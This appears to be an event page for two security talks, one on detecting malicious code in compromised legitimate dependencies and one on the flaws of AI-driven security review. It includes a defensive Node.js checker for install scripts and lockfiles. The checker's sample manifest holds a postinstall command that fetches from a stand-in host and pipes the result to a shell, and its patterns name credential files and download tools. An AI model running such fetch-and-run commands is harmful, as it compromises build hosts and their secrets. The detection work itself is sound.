Malicious Code in Legitimate Deps & AI Security Reviews: The Road Ahead
About this Event
The Compromised Maintainer Problem: Detecting Malicious Code in Legitimate Dependencies with Amro Haddadah
Supply chain attacks have changed. A few years ago the story was typosquatting and obviously sketchy packages with five downloads. Today it’s the opposite. Attackers are going after the packages you already trust, the ones with millions of weekly installs and maintainers you have heard of. XZ Utils, the wave of npm maintainer account takeovers, self-replicating worms like Shai-Hulud, leaked PyPI tokens in public CI logs. The pattern is consistent and it is getting worse.
The hard part is that traditional tooling does not catch any of this in time. SCA scanners look for known CVEs, but there is no advisory yet. The package name is legitimate. The signature checks out, because the attacker is publishing with the maintainer's own credentials or tokens, so a valid signature only proves who pushed the version, not that its contents are benign. By the time the ecosystem catches up, the malicious version has already shipped to production for thousands of teams.
In this session we will share what we have learned at cyberxyz.io building detection for these attacks across npm, PyPI, NuGet and Go. We will walk through a few recent real incidents, the behavioral signals that gave them away (suspicious install-time scripts, network callbacks, obfuscated payloads, unusual maintainer activity), and why waiting for a CVE will always leave you exposed. From there we will get practical: pre-install scanning, sandboxing build steps, lockfile pinning with provenance, and monitoring for dependency drift over time.
The talk is aimed at AppSec engineers, platform teams, and developers who own anything in the CI/CD or dependency policy world.
Key Takeaways:
1. Legitimate does not mean safe. The threat model has shifted from fake packages to compromised real ones, and your defenses probably have not caught up.
2. Why SCA tools, SBOMs, and CVE feeds are structurally too slow for this class of attack.
3. The behavioral signals that actually catch malicious package versions before anyone files an advisory.
4. A defense in depth approach that covers pre-install, build time, and runtime, with concrete things you can ship next week.
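The two cheapest controls in that list, pre-install scanning of lifecycle scripts and lockfile drift monitoring, are easy to sketch. The following Node.js snippet is an added example written for this page; it is not code from the talk or from cyberxyz.io. It assumes npm's package.json `scripts` field and a lockfileVersion 2/3 `packages` map, and the regex heuristics, the `registry.npmjs.org` host check and all sample manifests are illustrative assumptions, not a production rule set.

```javascript
// Added example (not from the talk or cyberxyz.io): a pre-install check on lifecycle
// scripts and a lockfile drift check, run against constructed sample data.

// Hooks npm runs automatically when a dependency is installed from the registry.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Behavioural indicators in an install script (assumed heuristics). Any hit is a reason
// to block until a human has looked; none of them is proof of malice on its own.
const RISKY_PATTERNS = [
  { id: "remote-fetch", re: /\b(curl|wget|Invoke-WebRequest)\b/i, why: "downloads content during install" },
  { id: "inline-exec", re: /\bnode\s+-e\b|\beval\s*\(|new Function\(/, why: "executes inline code" },
  { id: "shell-pipe", re: /\|\s*(sh|bash)\b/, why: "pipes fetched data into a shell" },
  { id: "obfuscation", re: /base64|\\x[0-9a-f]{2}|String\.fromCharCode/i, why: "encoded or obfuscated payload" },
  { id: "credential-access", re: /\.npmrc|NPM_TOKEN|\.ssh\/|AWS_SECRET/i, why: "reads credentials from the build host" },
];

// Pre-install check: inspect the manifest's lifecycle scripts, decide allow / review / block.
function auditInstallScripts(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push({ hook, pattern: "lifecycle-script", detail: cmd }); // any hook at all is worth a look
    for (const p of RISKY_PATTERNS) {
      if (p.re.test(cmd)) findings.push({ hook, pattern: p.id, detail: p.why });
    }
  }
  const risky = findings.some((f) => f.pattern !== "lifecycle-script");
  const action = risky ? "block" : findings.length ? "review" : "allow";
  return { name: manifest.name, version: manifest.version, action, findings };
}

// Drift check: diff the lockfile reviewed last time against the one about to be installed.
function diffLockfiles(before, after, registryHost = "registry.npmjs.org") {
  const changes = [];
  const oldPkgs = before.packages || {};
  const newPkgs = after.packages || {};
  const shortName = (p) => p.replace(/^.*node_modules\//, "");
  for (const [path, entry] of Object.entries(newPkgs)) {
    if (path === "") continue; // root project entry, not a dependency
    const name = shortName(path);
    if (entry.resolved) {
      try {
        const host = new URL(entry.resolved).host;
        if (host !== registryHost) changes.push({ name, kind: "off-registry", detail: host });
      } catch {
        changes.push({ name, kind: "unparseable-resolved", detail: entry.resolved });
      }
    }
    const prev = oldPkgs[path];
    if (!prev) {
      changes.push({ name, kind: "added", detail: entry.version });
    } else if (prev.version !== entry.version) {
      changes.push({ name, kind: "version", detail: `${prev.version} -> ${entry.version}` });
    } else if (prev.integrity !== entry.integrity) {
      // Same version string, different tarball hash: the published content was replaced.
      changes.push({ name, kind: "integrity-mismatch", detail: `${prev.integrity} -> ${entry.integrity}` });
    }
  }
  for (const path of Object.keys(oldPkgs)) {
    if (path !== "" && !(path in newPkgs)) {
      changes.push({ name: shortName(path), kind: "removed", detail: oldPkgs[path].version });
    }
  }
  return changes;
}

// Constructed sample inputs (not real packages).
const BENIGN_MANIFEST = { name: "tiny-util", version: "1.0.0", scripts: { test: "node test.js" } };
const SUSPICIOUS_MANIFEST = {
  name: "popular-lib",
  version: "4.2.1",
  scripts: { postinstall: "node -e \"require('child_process').exec('curl -s https://example.invalid/p | sh')\"", test: "jest" },
};
const LOCK_BEFORE = { lockfileVersion: 3, packages: {
  "": { name: "app", version: "1.0.0" },
  "node_modules/popular-lib": { version: "4.2.0", resolved: "https://registry.npmjs.org/popular-lib/-/popular-lib-4.2.0.tgz", integrity: "sha512-AAAA" },
  "node_modules/helper": { version: "2.0.0", resolved: "https://registry.npmjs.org/helper/-/helper-2.0.0.tgz", integrity: "sha512-BBBB" },
} };
const LOCK_AFTER = { lockfileVersion: 3, packages: {
  "": { name: "app", version: "1.0.0" },
  "node_modules/popular-lib": { version: "4.2.1", resolved: "https://registry.npmjs.org/popular-lib/-/popular-lib-4.2.1.tgz", integrity: "sha512-CCCC" },
  "node_modules/helper": { version: "2.0.0", resolved: "https://registry.npmjs.org/helper/-/helper-2.0.0.tgz", integrity: "sha512-DDDD" },
  "node_modules/newdep": { version: "0.0.1", resolved: "https://mirror.example.invalid/newdep-0.0.1.tgz", integrity: "sha512-EEEE" },
} };

console.log(JSON.stringify(auditInstallScripts(SUSPICIOUS_MANIFEST), null, 2)); // action: "block"
console.log(JSON.stringify(diffLockfiles(LOCK_BEFORE, LOCK_AFTER), null, 2)); // 4 changes
```

In practice the script audit runs on the tarball's package.json before `npm install` (with `ignore-scripts` set in `.npmrc` so nothing executes until the check passes), and the drift diff runs on every pull request that touches package-lock.json. The `integrity-mismatch` case is the one to treat as an incident rather than a review item: a version string that did not change but whose tarball hash did means the registry content was swapped underneath the pin.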
About Amro Haddadah
Founder of CyberXYZ Security and a cybersecurity researcher and leader specializing in detection of advanced malicious packages, 0-day vulnerabilities, threat detection, supply chain security, and AI-driven vulnerability research.
AI Security Reviews: Power, Flaws, and the Road Ahead with Caelan Drayer
AI tools are increasingly used for security reviews, and they produce genuinely impressive results. This talk takes a build-then-break approach to understanding why that is both exciting and dangerous.
The first half shows what AI-assisted review can do: scanning for common vulnerability patterns, coordinating multi-agent audit workflows where specialized reviewers build on each other's findings, and evaluating architecture for design-level security concerns. For known patterns, these tools are fast, thorough, and newly accessible.
The second half dismantles that confidence through five structural flaws. Context window limits mean AI reviews code like reading a novel by flipping to random pages. Models report, with full confidence, vulnerabilities that do not exist. Training biases catch well-known vulnerability classes while business logic flaws slip through. No runtime context means the AI knows nothing about deployment or infrastructure. And underlying all of it: pattern matching is not understanding.
The talk closes with the broader risks of a world where AI writes the code it also reviews. When millions of developers use the same models, they ship the same blind spots. Developers lose understanding of the code they accept. Review can't keep pace with AI-speed output. And models trained on decades of insecure practices faithfully reproduce them.
The goal is not to discourage AI in security workflows, but to be precise about where it falls flat so practitioners can build around it.
Key Takeaways:
1. AI is pattern matching, not understanding. That distinction explains every capability it has and every way it fails.
2. AI security review has five structural flaws that better models won't fix: limited context windows, hallucinated findings, bias toward common vulnerability classes, no awareness of runtime or deployment, and no actual comprehension of what the code does.
3. When developers use the same models, the result is shared blind spots at scale, lost understanding of shipped code, review that can't keep pace with output, and insecure training data that compounds through each generation.
4. AI findings are a starting point, not a conclusion. Teams that treat them as authoritative will miss the issues that matter most.
5. Security processes built for human-speed development don't work when code is produced at 5-10x that rate. The pipeline needs to evolve.
About Caelan Drayer
I work at Dyrand Systems, an IT Managed Service Provider in Vancouver. A significant part of my role is acting as a vCIO, advising clients on AI adoption - the advantages, the risks, and the practical issues that come with deploying these tools in real environments.
Outside of work, I have a strong personal interest in AI and have spent considerable time testing different tools, learning how to orchestrate workflows, and pushing to see what actually delivers results. That led me to build cAgents (https://github.com/CaelanDrayer/cAgents), to test security reviews, code audits, design, and more.
This talk grew directly out of that combination of professional and personal experience: watching AI produce outputs that looked authoritative, then systematically testing where and how it broke down. I use these tools daily and have developed a clear sense of where they deliver and where they fall flat.
USD 0.00